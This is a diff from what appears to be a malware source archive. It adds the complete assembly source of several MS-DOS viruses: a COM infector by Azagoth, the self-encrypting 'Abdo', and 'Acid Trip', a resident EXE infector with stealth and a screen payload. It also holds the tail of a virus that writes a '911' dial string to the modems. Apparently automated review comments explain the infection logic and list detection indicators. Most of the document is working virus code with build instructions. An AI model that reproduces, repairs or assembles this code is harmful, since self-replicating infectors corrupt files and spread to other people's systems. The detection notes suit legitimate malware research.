bp + iret ; Interrupt return +int_08h_entry endp + + +; +; SUBROUTINE +; + +sub_1 proc near + push cs + pop ds + xor al,al ; Zero register + mov ah,data_10 + cmp ah,11h + jne loc_28 ; Jump if not equal + mov ah,data_13 + cmp ah,3Bh ; ';' + jne loc_29 ; Jump if not equal + mov ah,data_12 + cmp ah,3Bh ; ';' + jne loc_30 ; Jump if not equal + mov ah,data_11 + cmp ah,17h + jne loc_31 ; Jump if not equal + mov data_11,al +loc_25: + mov data_12,al +loc_26: + mov data_13,al +loc_27: + mov data_10,al + retn +loc_28: + inc data_10 + retn +loc_29: + inc data_13 + jmp short loc_27 +loc_30: + inc data_12 + jmp short loc_26 +loc_31: + inc data_11 + jmp short loc_25 +sub_1 endp + +data_32 db '+++aTh0m0s7=35dp911' + db 7 dup (2Ch) + +; +; SUBROUTINE +; + +sub_2 proc near + mov al,data_16 + cmp al,1 + je loc_ret_39 ; Jump if equal + mov al,data_17 + cmp al,1 + je loc_33 ; Jump if equal + mov cx,3 + +locloop_32: + mov dx,cx + xor ah,ah ; Zero register + mov al,83h + int 14h 
; RS-232 dx=com4, ah=func 00h + ; reset port, al=init parameter + loop locloop_32 ; Loop if cx > 0 + + mov al,1 + mov data_17,al + jmp short loc_ret_39 + db 90h +loc_33: + push cs + pop ds + mov si,offset data_32 ; ('+++aTh0m0s7=35dp911') + mov al,data_15 + cmp al,1Ah + jne loc_36 ; Jump if not equal + jmp short loc_37 + db 90h +loc_36: + xor ah,ah ; Zero register + add si,ax + mov al,[si] + mov dx,3F8h + out dx,al ; port 3F8h, RS232-1 xmit buffr + mov dx,2F8h + out dx,al ; port 2F8h, RS232-2 xmit buffr + mov dx,2E8h + out dx,al ; port 2E8h, 8514 Horiz total + mov dx,3E8h + out dx,al ; port 3E8h ??I/O Non-standard + inc data_15 + jmp short loc_ret_39 + db 90h +loc_37: + mov cx,3 + +locloop_38: + mov dx,cx + mov al,0Dh + mov ah,1 + int 14h ; RS-232 dx=com4, ah=func 01h + ; write char al, ah=retn status + loop locloop_38 ; Loop if cx > 0 + + mov ax,1 + mov data_16,al + mov data_15,ah + mov data_17,ah + +loc_ret_39: + retn +sub_2 endp + +loc_40: + mov ah,0E0h + int 21h ; ??INT Non-standard interrupt + cmp ax,0DADAh + jne loc_41 ; Jump if not equal + jmp loc_44 +loc_41: + push cs + pop ds + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov word ptr data_5,bx + mov word ptr data_5+2,es + mov dx,offset int_21h_entry + mov ax,2521h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,3508h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov word ptr data_7,bx + mov word ptr data_7+2,es + mov dx,offset int_08h_entry + mov ax,2508h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dx=sec + mov data_11,ch + mov data_12,cl + mov data_13,dh + mov ax,cs:psp_envirn_seg + mov ds,ax + xor si,si ; Zero register +loc_42: + mov al,[si] + cmp al,1 + je loc_43 ; Jump if equal + inc si + jmp short loc_42 +loc_43: + inc si + inc si + mov dx,si + mov ax,cs + mov es,ax + mov 
bx,5Ah + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change memory allocation + ; bx=bytes/16, es=mem segment + mov bx,cs:psp_cmd_tail + mov ax,cs + mov es,ax + mov cs:data_30,ax + mov cs:data_31,ax + mov cs:data_29,ax + mov ax,4B00h + mov cs:data_22,ss + mov cs:data_23,sp + pushf ; Push flags + call cs:data_5 + mov ax,cs:data_22 + mov ss,ax + mov ax,cs:data_23 + mov sp,ax + mov ax,cs + mov ds,ax + mov dx,537h + int 27h ; Terminate & stay resident + ; dx=offset last byte+1, cs=PSP +loc_44: + mov ah,0E1h + int 21h ; ??INT Non-standard interrupt + mov si,4F3h + mov cs:[si+3],ax + mov ax,4F8h + mov cs:[si+1],ax + mov ax,cs:data_20 + mov bx,cs +;* jmp far ptr loc_1 ;* + db 0EAh, 00h, 00h, 00h, 00h + db 8Bh,0C8h, 8Eh,0DBh + db 0BEh, 00h, 01h + db 0BFh, 37h, 05h + +locloop_45: + mov al,[di] + mov [si],al + inc si + inc di + loop locloop_45 ; Loop if cx > 0 + + mov si,51Fh + mov cs:[si+3],ds + mov al,byte ptr ds:[100h] + sub al,0Bh + mov byte ptr ds:[100h],al + mov ax,ds + mov es,ax + mov ss,ax + jmp far ptr start +data_35 db 'Support Your Police' +data_36 db 0D8h + db 20h + +seg_a ends + + + + end start + +; +; This quality file was downloaded from +; +; E X T R E M E +; ------------+------------ Ŀ +; /|\ +; / | \ Portland Metro All Text BBS +; / | \ +; / | \ 9600: 503-775-0374 +; / | \ SysOp: Thing One +; / | \ +; / | \ +; d r e a m e s + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown._468.asm b/MSDOS/Virus.MSDOS.Unknown._468.asm new file mode 100644 index 00000000..4ed48693 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown._468.asm 
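Review bot: The header says the trigger will `display "Support Your Police" on the screen`, but in the listing `data_35` is referenced only by `mov di,offset data_35` in `locloop_16`, where 13h bytes of it are compared against the tail of the file being examined as an infection marker; no INT 10h or INT 21h text output of the string appears anywhere in the hunk. The header should be corrected to something like `; "Support Your Police" (data_35) is the 19-byte infection marker; this listing contains no code that displays it`, with the modem payload described as the actual manipulation task: `sub_2` resets the serial ports via `int 14h` and then, one byte per INT 08h tick, writes `data_32` (`+++aTh0m0s7=35dp911`) to ports 3F8h/2F8h/2E8h/3E8h. Also worth flagging for anyone reassembling: `loc_44` patches a zeroed far jump (`db 0EAh,00h,00h,00h,00h`) through the fixed offsets `mov si,4F3h` and `mov si,51Fh`, so any change to the layout before those offsets silently breaks the transfer to the host. The BBS trailer comment after `end start` is mis-encoded (`Ŀ` and stray bytes where box-drawing characters were) and should be re-encoded or trimmed.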
@@ -0,0 +1,257 @@ +; virus from ALT-11 mag + +; --------------------------------------- +; +; Coded by: Azagoth +; --------------------------------------- +; Assemble using Turbo Assembler: +; tasm /m2 .asm +; tlink /t .obj +; --------------------------------------------------------------------------- +; - Non-Overwriting .COM infector (excluding COMMAND.COM) +; - COM growth: XXX bytes +; - It searches the current directory for uninfected files. If none are +; found, it searches previous directory until it reaches root and no more +; uninfected files are found. (One infection per run) +; - Also infects read-only files +; - Restores attributes, initial date/time-stamps, and original path. +; --------------------------------------------------------------------------- + + .model tiny + .code + + org 100h ; adjust for psp + +start: + + call get_disp ; push ip onto stack +get_disp: + pop bp ; bp holds current ip + sub bp, offset get_disp ; bp = code displacement + + ; original label offset is stored in machine code + ; so new (ip) - original = displacement of code + +save_path: + mov ah, 47h ; save cwd + xor dl, dl ; 0 = default drive + lea si, [bp + org_path] + int 21h + +get_dta: + mov ah, 2fh + int 21h + + mov [bp + old_dta_off], bx ; save old dta offset + +set_dta: ; point to dta record + mov ah, 1ah + lea dx, [bp + dta_filler] + int 21h + +search: + mov ah, 4eh ; find first file + mov cx, [bp + search_attrib] ; if successful dta is + lea dx, [bp + search_mask] ; created + int 21h + jnc clear_attrib ; if found, continue + +find_next: + mov ah, 4fh ; find next file + int 21h + jnc clear_attrib + +still_searching: + mov ah, 3bh + lea dx, [bp + previous_dir] ; cd .. 
+ int 21h + jnc search + jmp bomb ; at root, no more files + +clear_attrib: + mov ax, 4301h + xor cx, cx ; get rid of attributes + lea dx, [bp + dta_file_name] + int 21h + +open_file: + mov ax, 3D02h ; AL=2 read/write + lea dx, [bp + dta_file_name] + int 21h + + xchg bx, ax ; save file handle + ; bx won't change from now on +check_if_command_com: + cld + lea di, [bp + com_com] + lea si, [bp + dta_file_name] + mov cx, 11 ; length of 'COMMAND.COM' + repe cmpsb ; repeat while equal + jne check_if_infected + jmp close_file + +check_if_infected: + mov dx, word ptr [bp + dta_file_size] ; only use first word since + ; COM file + sub dx, 2 ; file size - 2 + + mov ax, 4200h + mov cx, 0 ; cx:dx ptr to offset from + int 21h ; origin of move + + mov ah, 3fh ; read last 2 characters + mov cx, 2 + lea dx, [bp + last_chars] + int 21h + + mov ah, [bp + last_chars] + cmp ah, [bp + virus_id] + jne save_3_bytes + mov ah, [bp + last_chars + 1] + cmp ah, [bp + virus_id + 1] + jne save_3_bytes + jmp close_file + +save_3_bytes: + mov ax, 4200h ; 00=start of file + xor cx, cx + xor dx, dx + int 21h + + mov ah, 3Fh + mov cx, 3 + lea dx, [bp + _3_bytes] + int 21h + +goto_eof: + mov ax, 4202h ; 02=End of file + xor cx, cx ; offset from origin of move + xor dx, dx ; (i.e. nowhere) + int 21h ; ax holds file size + + ; since it is a COM file, overflow will not occur + +save_jmp_displacement: + sub ax, 3 ; file size - 3 = jmp disp. 
+ mov [bp + jmp_disp], ax + +write_code: + mov ah, 40h + mov cx, virus_length ;*** equate + lea dx, [bp + start] + int 21h + +goto_bof: + mov ax, 4200h + xor cx, cx + xor dx, dx + int 21h + +write_jmp: ; to file + mov ah, 40h + mov cx, 3 + lea dx, [bp + jmp_code] + int 21h + + inc [bp + infections] + +restore_date_time: + mov ax, 5701h + mov cx, [bp + dta_file_time] + mov dx, [bp + dta_file_date] + int 21h + +close_file: + mov ah, 3eh + int 21h + +restore_attrib: + xor ch, ch + mov cl, [bp + dta_file_attrib] ; restore original attributes + mov ax, 4301h + lea dx, [bp + dta_file_name] + int 21h + +done_infecting?: + mov ah, [bp + infections] + cmp ah, [bp + max_infections] + jz bomb + jmp find_next + + +bomb: + +; cmp bp, 0 +; je restore_path ; original run +; +;---- Stuff deleted + +restore_path: + mov ah, 3bh ; when path stored + lea dx, [bp + root] ; '\' not included + int 21h + + mov ah, 3bh ; cd to original path + lea dx, [bp + org_path] + int 21h + +restore_dta: + mov ah, 1ah + mov dx, [bp + old_dta_off] + int 21h + +restore_3_bytes: ; in memory + lea si, [bp + _3_bytes] + mov di, 100h + cld ; auto-inc si, di + mov cx, 3 + rep movsb + +return_control_or_exit?: + cmp bp, 0 ; bp = 0 if original run + je exit + mov di, 100h ; return control back to prog + jmp di ; -> cs:100h + +exit: + mov ax, 4c00h + int 21h + +;-------- Variable Declarations -------- + +old_dta_off dw 0 ; offset of old dta address + +;-------- dta record +dta_filler db 21 dup (0) +dta_file_attrib db 0 +dta_file_time dw 0 +dta_file_date dw 0 +dta_file_size dd 0 +dta_file_name db 13 dup (0) +;-------- +search_mask db '*.COM',0 ; files to infect: *.COM +search_attrib dw 00100111b ; all files a,s,h,r +com_com db 'COMMAND.COM' + +previous_dir db '..',0 +root db '\',0 +org_path db 64 dup (0) ; original path + +infections db 0 ; counter +max_infections db 1 + +_3_bytes db 0, 0, 0 +jmp_code db 0E9h +jmp_disp dw 0 + +last_chars db 0, 0 ; do last chars = ID ? 
+ +virus_id db 'AZ' + +eov: ; end of virus + +virus_length equ offset eov - offset start + + end start + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.abdo.asm b/MSDOS/Virus.MSDOS.Unknown.abdo.asm new file mode 100644 index 00000000..658253f2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.abdo.asm 
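Review bot: The header line `; - COM growth: XXX bytes` is an unfilled placeholder; the actual figure is `virus_length equ offset eov - offset start` at the bottom of the listing, and the sample name suggests 468, so I would write `; - COM growth: virus_length bytes (offset eov - offset start; 468 per sample name - confirm by assembling)`. The `bomb:` label is followed only by commented-out lines and `;---- Stuff deleted`, so the published listing falls straight through to `restore_path` with no payload, and a comment stating that the trigger routine was excised from this copy would stop readers from assuming the routine is intact. Note also that `check_if_infected` uses only the low word of `dta_file_size` (as its comment says) and does `sub dx,2` before the seek with no lower bound, so a COM file shorter than two bytes wraps to a large offset and the following 2-byte read leaves `last_chars` stale; a comment such as `; assumes file size >= 2 (no guard)` documents the limitation.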
@@ -0,0 +1,180 @@ +; NAME: Abdo.com +; AUTHOR: Sea4 +; SIZE: 310 bytes +; ENCRYPTION: Yep +; STEALTH: Nope +; ROI: All files in current DIR +; DT: Nope + +; Here is an interesting concept in encryption. Brought to my attention by +; Aperson. The virus will use the host programs own bytes to XOR against. Its +; very interesting because there is no way to tell what the host will have +; as its values, so the encryption could almost be considered random. Upon +; infection, the father virus will read from the victim file enough bytes to +; cover the encrypted area. It will then, XOR each virus byte against each +; host byte and keep the results in the buffer. It will then write those new +; bytes to the victim. Upon startup of the victim it will call the Decryption +; with a pointer (BX) to the bytes to use as Decryptors. Of course this has +; a flaw if the host program decides to change its own bytes, though highly +; uncommon among normal progges. Enjoy! + +Start: +jmp V_start ; Jump to start of virus + +V_start: ; delta offset stuff +call Delta +Delta: +pop bp +sub bp,offset delta + +SkipDec: ; Call decryption +jmp Ende +; mov cx,Crypto-Hidden +lea si,[bp+Hidden] +mov di,si +mov bx,103h +Call Crypto + +Hidden: + +mov di,100h ; Restore first 3 bytes +lea si,[bp+saved] +mov cx,3 +rep movsb + +mov ah,4Eh ; Find first/next com files +FindNext: +xor cx,cx +lea dx,[bp+FileMask] +int 21h + +jnc Open ; Found one, open it +jmp Exit ; Didn't find any, return to progge + +Close: +jmp ShutFile + +Open: +mov ax,3D02h ; Open file +lea dx,9Eh +int 21h + +xchg bx,ax ; File handle into BX + +mov ah,3Fh ; Read first bytes into buffer +lea dx,[bp+saved] +mov cx,3 +int 21h + +xor ax,ax +cmp ax,[80h+1Ch] +jnz Close + +mov ax,[80h+1Ah] + +cmp ax,0F000h ; Infection criteria +jnc Close ; No files > 61440d bytes +cmp ax,400h ; None < 1024d bytes +jc Close + +sub ax,3 ; Makes account for the JMP +sub ax,Ende-V_start ; Subtracts the length of virus + +cmp ax,[bp+saved+1] ; If the file jumps 
to AX then it must be + ; infected with this virus, or its very lucky +je Close ; Close it up if its already infected + +mov ax,[80h+1Ah] ; Set new JMP destination +sub ax,3 ; Subtracts the JMP length +mov [bp+jumpto],ax ; Puts the jumpto location in its buffer + +mov ax,4200h ; Return file pointer to beginning of file +xor dx,dx +xor cx,cx +int 21h + +mov ah,40h ; Writes the new JMP +mov cx,3 +lea dx,[bp+jumping] +int 21h + +XorValues EQU Crypto-Hidden+Buffer + +mov ah,3Fh ; Read from File to get XORvalues +lea dx,[bp+xorvalues] ; The file pointer is already at 00:03h + ; now we just need to put the bytes in a buffer +mov cx,Crypto-Hidden ; Length of Bytes to get ( Same length as hidden + ; area, because thats all we need. ) +int 21h ; Tells DOS to fetch some bytes + +mov ax,4202h ; Move File pointer to end of progge +xor cx,cx +xor dx,dx +int 21h + +mov ah,40h ; Write Call decryption routines +lea dx,[bp+v_start] +mov cx,Hidden-V_start +int 21h + +lea di,[bp+buffer] ; Call encryption of Hidden area +lea si,[bp+hidden] +mov cx,Crypto-Hidden +push cx ; Saves CX for the write +push bx ; Saves BX because it is the file handle +lea bx,[bp+xorvalues] ; Place where victim file's bytes have been put +call Crypto ; Calls the encryption routine +pop bx ; Retrieves the file handle for the Write + +mov ah,40h ; Write encrypted area to file +pop cx +lea dx,[bp+buffer] +int 21h + +lea dx,[bp+crypto] ; Write encryption routine to victim +mov cx,Ende-Crypto +mov ah,40h +int 21h + +ShutFile: ; Close victim and search for next +mov ah,3Eh +int 21h +mov ax,4F00h +jmp FindNext + +Exit: +push 100h +ret + +FileMask db '*.com',0 +VirusName db '[Abdo]',0 +Author db 'Sea4, CodeBreakers',0 +message db 'Concept by: Aperson of the CodeBreakers!' 
+ +Saved db 0CDh,020h,090h +Jumping db 0E9h +jumpto db 0h,0h + +Crypto: +EncLoop: +lodsb ; Takes the byte from [SI] +mov dl,[bx] ; Gets the next byte of host file +xor al,dl ; XORs the 2 bytes, and saves them in AL +inc bx ; Moves to next byte +stosb ; Places the byte back in [DI] +loop EncLoop ; Does 'em all +ret ; Return to calling routine + +Buffer: + +Ende: +lea di,SkipDec +lea si,NewBytes + +mov cx,3 +rep movsb +jmp Hidden + +NewBytes: +mov cx,Crypto-Hidden +Finish: diff --git a/MSDOS/Virus.MSDOS.Unknown.acidtrip.asm b/MSDOS/Virus.MSDOS.Unknown.acidtrip.asm new file mode 100644 index 00000000..bf1ed4fb --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.acidtrip.asm 
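Review bot: `SkipDec: jmp Ende` reads as though decryption is always skipped, but it is the generation-0 form only: `Ende` does `lea di,SkipDec` / `lea si,NewBytes` / `rep movsb` to overwrite those three bytes in memory with `mov cx,Crypto-Hidden` before the infection loop writes `Hidden-V_start` bytes from `[bp+v_start]`, so victims carry the real decryptor call while `Ende`..`Finish` itself is never written (the last write is `Ende-Crypto` bytes). That bootstrap uses absolute offsets with no `bp` delta and so only works when the code runs at its original offset, which is exactly the generation-0 case; a comment above `SkipDec` such as `; gen-0 only: Ende patches this jmp to 'mov cx,Crypto-Hidden' in memory before infection; children run the decryptor` would make the control flow legible. For detection purposes it is also worth recording in the header that the key is the host's own bytes at file offset 3 (`mov bx,103h` at run time, `lea dx,[bp+xorvalues]` read at offset 3 on infection), so `V_start`..`Hidden` and the `Crypto` loop are byte-identical across generations and the encryption covers only `Hidden`..`Crypto`.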
@@ -0,0 +1,459 @@
+;
+; Acid Trip by Crypt Keeper [Phalcon/Skism]
+;
+; Acid Trip is an Enemy Within variant with a trigger routine and
+; a few bug fixes. It goes off at 12:00pm (any day) if the monitor
+; is in 80x25x16color text mode, scrolling wildly through the color
+; pallete and displaying "Your PC is on an [Acid Trip]... Try again
+; later..." near the center of the screen.
+;
+
+; To compile:
+
+; TASM ACIDTRIP.ASM /M3
+; TLINK ACIDTRIP.OBJ /t
+; .COM file can be executed with no modifications
+
+ .model tiny
+ .code
+
+ org 100h ;make this a com file
+
+acidtrip:
+
+;----------------------------------------------------------------------------
+
+vlength equ vbot-offset(acidtrip) ;Virus length in bytes
+heapsiz equ hbot-htop ;size of heap data in bytes
+ressize equ 1256/16 ;Virus size resident
+virusid equ 08AC5h ;Virus ID word in EXE header
+chkfunc equ 0FFFFh ;Check resident function for int 21h
+
+;----------------------------------------------------------------------------
+
+ push ds es ;save startup registers
+
+ db 0BDh ;mov bp,
+delta dw 0 ;delta offset
+
+ xor ax,ax
+ dec ax ;AX=FFFF (check resident function)
+ int 21h ;check if virus is resident
+
+ inc ax ;is virus resident (zero if yes)
+ jz return ;if so, don't install
+
+ ;Microsoft Windows/Desqview compatable load resident routine
+install:
+ mov ah,48h ;allocate memory
+ mov bx,ressize ;amount of memory to request
+ int 21h
+
+ jc not_enough_memory ;carry set means allocation error
+
+ mov es,ax ;ax=segment of allocated memory
+
+ dec ax
+ mov ds,ax ;segment of MCB for memory
+ mov word ptr ds:[01h],08h ;set memory block as independant
+ jmp short memory_allocation_complete
+not_enough_memory:
+ pop ax
+ push ax ;get PSP value off stack
+ mov es,ax ;ES=PSP for set memory block size
+ dec ax
+ mov ds,ax ;get segment of this program's MCB
+
+ mov bx,word ptr ds:[03h] ;get size of current block
+ dec bx ;decrease size of memory block
+
+ mov ah,4Ah ;set memory block size
+ int 21h
+
+ jc
return ;return if allocation error
+ jmp short install ;try to allocate again
+memory_allocation_complete:
+ push cs
+ pop ds
+
+ push es ;save found target segment
+
+ mov ax,3521h ;get int 21h vector
+ int 21h
+
+ mov [bp+offset(i21vecs)],es
+ mov [bp+offset(i21veco)],bx
+
+ pop es
+
+ mov cx,(vlength+heapsiz+1)/2 ;words to move
+ mov di,100h ;destination in memory
+ lea si,[bp+offset(acidtrip)] ;source of viral code
+
+ rep movsw ;copy ourselves up there
+
+ push es
+ pop ds ;segment to set int vector
+ mov dx,offset(i21vec) ;int 21h vector
+
+ mov ax,2421h ;set int 21h vector
+ inc ah ;without setting off mem resident
+ int 21h ;code heuristic flags
+
+return: pop bx ;segment of PSP
+ mov es,bx
+
+ add bx,16 ;compensate for PSP size
+ add cs:[bp+offset(old_cs)],bx ;add PSP to initial CS
+
+ pop ds ;restore old DS register
+
+ cli ;clear interrupt enable flag
+ mov ax,cs:[bp+offset(old_ss)] ;old SS register
+ add ax,bx ;add PSP adress
+ mov ss,ax
+ db 0BCh ;mov sp,
+old_sp dw 0 ;old stack pointer
+ sti ;set interrupt enable flag
+
+ jmp dword ptr cs:[bp+offset(old_ip)] ;jump to original EXE code
+
+;----------------------------------------------------------------------------
+
+vauthor db 'Crypt Keeper P/S'
+
+old_ip dw 0
+old_cs dw 0FFF0h ;Old CS:IP
+
+old_ss dw 0FFF0h ;old stack segment
+
+message db 'Your PC is on an [Acid Trip]... Try again later...$'
+
+;----------------------------------------------------------------------------
+
+i21vec: cmp ax,chkfunc ;check resident function?
+ jne no_check_func
+
+ iret ;return from interrupt
+
+no_check_func:
+ push ax bx cx dx ;push all used registers
+
+ mov ah,2Ch ;get time
+ call function
+
+ cmp cx,0C00h ;12:00pm?
+ jne no_trippin ;if not, don't trigger
+
+ mov ah,15 ;return current video state
+ int 10h ;BIOS video call
+
+ cmp al,3 ;text mode?
+ jne no_trippin ;if not, don't trigger
+
+ mov dx,0A0Fh ;row,column for cursor
+ mov ah,2 ;set cursor position
+ int 10h
+
+ push cs
+ pop ds
+
+ mov dx,offset(message) ;message to display
+ mov ah,9 ;print string
+ call function
+
+ mov ax,1002h ;Set palette registers, from buffer
+trippin:
+ inc dx ;move to next group of numbers in mem
+ int 10h
+ jmp short trippin
+
+no_trippin:
+ pop dx cx bx ax ;pop old registers
+
+ push ax ;save old AX
+ inc ah ;avoid execute intercept heuristic flags
+
+ cmp ax,4C00h ;load and execute program?
+ je _infect_on_exec
+
+ cmp ax,4C01h ;load program?
+ je _infect_on_exec
+
+ pop ax ;restore old AX value
+
+ cmp ah,11h ;find first file (FCB)?
+ je FCB_dir_stealth
+
+ cmp ah,12h ;find next file (FCB)?
+ je FCB_dir_stealth
+
+ cmp ah,4Eh ;find first file (DTA)?
+ je DTA_dir_stealth
+
+ cmp ah,4Fh ;find next file (DTA)?
+ je DTA_dir_stealth
+
+exit_interrupt_chained:
+ jmp dword ptr cs:i21veco ;execute rest of interrupt chain
+_infect_on_exec:
+ pop ax ;restore old AX
+ jmp infect_file ;and attempt to infect
+
+FCB_dir_stealth:
+ call function ;go ahead and execute
+
+ pushf
+ push dx cx bx es ax ;push all used registers
+
+ test al,al ;was find successful?
+ jnz exit_interrupt_stealth
+
+ mov ah,51h ;Get PSP address
+ int 21h
+
+ mov es,bx ;ES=PSP address
+
+ sub bx,word ptr es:[16h] ;parent PSP?
+ jnz exit_interrupt_stealth
+
+ mov bx,dx
+ mov al,byte ptr [bx] ;first byte of FCB
+
+ push ax
+
+ mov ah,2Fh ;get DTA adress
+ int 21h
+
+ pop ax
+
+ inc al
+ jnz checkFCBinfected ;extended FCB?
+
+ add bx,007h ;If so, make into normal
+
+checkFCBinfected:
+ mov ax,word ptr es:[bx+17h]
+ mov cx,word ptr es:[bx+19h] ;Get time and date
+
+ and ax,1Fh
+ and cx,1Fh
+ dec cx ;unmask seconds and date
+
+ xor ax,cx ;file infected?
+ jnz exit_interrupt_stealth ;exit stealth interrupt
+
+ sub word ptr es:[bx+01Dh],vlength
+ sbb word ptr es:[bx+01Fh],ax ;subtract virus size
+
+exit_interrupt_stealth:
+ pop ax es bx cx dx
+ popf ;pop all used registers
+exit_interrupt_stealthvec:
+ retf 02h ;return with given flags
+
+DTA_dir_stealth: ;DTA directory size subtract
+ call function ;go ahead and execute
+
+ jc exit_interrupt_stealthvec ;exit if function unsuccessful
+
+ pushf
+ push dx cx bx es ax ;push all used registers
+
+ mov ah,2Fh ;get DTA adress
+ int 21h
+
+ mov ax,word ptr es:[bx+16h]
+ mov cx,word ptr es:[bx+18h] ;get time and date stamps
+
+ and ax,1Fh
+ and cx,1Fh
+ dec cx ;unmask seconds and date
+
+ xor cx,ax ;is file infected?
+ jnz exit_interrupt_stealth ;if not, don't subtract size
+
+ sub word ptr es:[bx+1Ah],vlength
+ sbb word ptr es:[bx+1Ch],cx ;subtract virus size in bytes
+
+ jmp short exit_interrupt_stealth
+
+move_pointer_end:
+ cwd ;zero cx and dx
+ mov cx,dx
+ mov ax,4202h ;move pointer from EOF
+function:
+ pushf
+ call dword ptr cs:i21veco ;simulate call to original int 21h
+ ret
+open_readwrite: ;opens file at DS:DX for read/write
+ mov ax,3D00h ;open for read only access
+ int 21h
+
+ jc bad_open ;carry set means open error
+
+ push cs
+ pop ds
+
+ push ax ;file handle
+ mov bx,ax
+
+ mov ax,1220h ;get JFT entry
+ int 2Fh
+
+ mov ax,1216h ;get SFT location
+ mov bl,byte ptr es:[di] ;handle number
+ int 2Fh
+
+ pop bx
+
+ mov word ptr es:[di+02h],2 ;set file for read/write
+ ret
+bad_open:
+ pop ax
+ jmp short exit_infect ;exit if bad open
+infect_file:
+ push ax si es di bx cx ds dx ;push all used registers
+
+ call open_readwrite ;open file for read/write access
+
+ mov cx,24 ;24 bytes of header to read
+ mov dx,offset(exeheader) ;EXE header information
+
+ mov ah,3Fh ;read file or device
+ int 21h
+
+ cmp cx,ax ;enough bytes read?
+ jne bad_file ;if not, file too small
+
+ mov cx,exeid
+ cmp cx,'MZ'
+ je disease_exe
+ xor cx,'ZM'
+ jz disease_exe ;exe file?
+
+bad_file:
+ mov ah,3Eh ;close file with handle
+ int 21h
+
+exit_infect:
+ pop dx ds cx bx di es si ax ;pop all used registers
+ jmp exit_interrupt_chained ;execute rest of interrupt chain
+
+disease_exe:
+ cmp chksum,virusid ;file already infected?
+ je bad_file ;if so, bad file
+
+ lds si,dword ptr es:[di+0Dh] ;get old file date and time
+ push si ds ;and save
+
+ push cs
+ pop ds
+
+ add minallc,ressize ;add virus size in paragraphs
+
+ push es ;save SFT segment
+
+ les si,dword ptr ds:initss ;get initial SS:SP (reversed)
+ mov old_ss,si
+ mov old_sp,es
+
+ les si,dword ptr ds:initip ;get initial CS:IP
+ mov old_cs,es
+ mov old_ip,si
+
+ pop es
+
+ call move_pointer_end ;move file pointer to end of file
+
+ mov cx,16
+ div cx ;convert file size to seg:offset
+
+ sub ax,headers ;subtract header size from segment
+
+ mov initcs,ax
+ mov initip,dx ;set initial cs:ip
+
+ sub dx,100h
+ mov delta,dx ;set delta offset in virus code
+
+ add dx,offset(sspace)+64+100h
+ mov initsp,dx
+ mov initss,ax ;set initial SS:SP in exe header
+
+ mov chksum,virusid ;set file as already infected
+
+ mov dx,100h ;offset of virus code in memory
+ mov cx,vlength ;length of virus code
+
+ mov ah,40h ;write file or device
+ push ax
+ int 21h
+
+ call move_pointer_end ;get file size
+
+ mov cx,512
+ div cx ;convert to pages
+
+ test dx,dx ;no remainder?
+ jz no_remainder
+
+ inc ax ;if remainder add another page
+no_remainder:
+ mov expages,ax
+ mov exbytes,dx ;set new exe size
+
+ cwd
+ mov word ptr es:[di+15h],dx
+ mov word ptr es:[di+17h],dx ;zero file pointer in SFT
+
+ mov dx,offset(exeheader) ;exe header information
+ mov cx,24 ;24 bytes to change
+
+ pop ax ;write file or device
+ int 21h
+
+ pop dx cx ;old file date/time
+
+ push dx ;save original file date
+ and cx,-20h ;reset seconds
+ and dx,1Fh
+ dec dx ;unmask date field
+
+ or cx,dx ;seconds=date
+ pop dx ;restore old date
+
+ mov ax,5701h ;set file date and time
+ int 21h
+
+ jmp bad_file ;close and exit
+
+;----------------------------------------------------------------------------
+
+vbot equ $ ;bottom of virus code
+htop equ $ ;top of heap
+
+i21veco dw 0
+i21vecs dw 0 ;old int 21h vector
+
+exeheader:
+exeid dw 0 ;Unchanged ;EXE signature
+exbytes dw 0 ;number of bytes in last page
+expages dw 0 ;number of pages in file
+reloci dw 0 ;Unchanged ;number of items in relocation table
+headers dw 0 ;Unchanged ;size of header in paragraphs
+minallc dw 0 ;minimum memory to be allocated
+maxallc dw 0 ;Unchanged ;maximum memory to be allocated
+initss dw 0 ;initial SS value
+initsp dw 0 ;initial SP value (used as ID word)
+chksum dw 0 ;complimented checksum
+initip dw 0 ;initial IP value
+initcs dw 0 ;initial CS value
+reltabl dw 0 ;Unchanged ;byte offset to relocation table
+ovnum dw 0 ;Unchanged ;overlay number
+
+hbot equ $ ;bottom of heap data
+
+sspace db 70 dup (0) ;virus stack
+
+end acidtrip ;end of virus code
diff --git a/MSDOS/Virus.MSDOS.Unknown.acme.asm b/MSDOS/Virus.MSDOS.Unknown.acme.asm
new file mode 100644
index 00000000..1a442cea
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.acme.asm
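Review bot: The file has no analyst-facing summary of its indicators; every comment is instruction-local, so a reader has to trace the whole hunk to learn what marks an infected file. Two markers are set on the write path and then relied on by the stealth path: the EXE header checksum word is overwritten with `virusid` (`mov chksum,virusid`, 08AC5h), and the timestamp's seconds field is rewritten to the day-of-month minus one (`or cx,dx ;seconds=date`), which `checkFCBinfected` and `DTA_dir_stealth` test before subtracting `vlength` from the reported size. The resident side also has two observable traits: the allocated MCB's owner word is forced to 0008h (`mov word ptr ds:[01h],08h`) and an `int 21h` with AX=0FFFFh returns with AX unchanged (`i21vec: cmp ax,chkfunc` / `iret`). A header comment such as `; Indicators: EXE chksum word == 08AC5h; file time seconds == (day & 1Fh)-1; resident MCB owner 0008h; int 21h AX=FFFFh returns AX unchanged` would let a triage reader confirm a sample without tracing the code.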
@@ -0,0 +1,300 @@
+; ACME COMPANION VIRUS for Crypt Newsletter 9
+;
+; ACME is a fast and simple companion virus which will create a
+; spawned copy of itself for EVERY .EXE file it can find in the
+; current directory.
+;
+; ACME is ready to assemble using A86. If you recall, an earlier Crypt
+; letter included an A86-only source listing. (Strict TASM/MASM compatible
+; assemblers will need the manual addition of a couple simple declarative
+; statements.) I included ACME in this form so fans of Isaacson's
+; technique can gloat about the code not requiring "red tape." ;-]
+; A86 will assemble ACME directly to a .COMfile virus, no linker
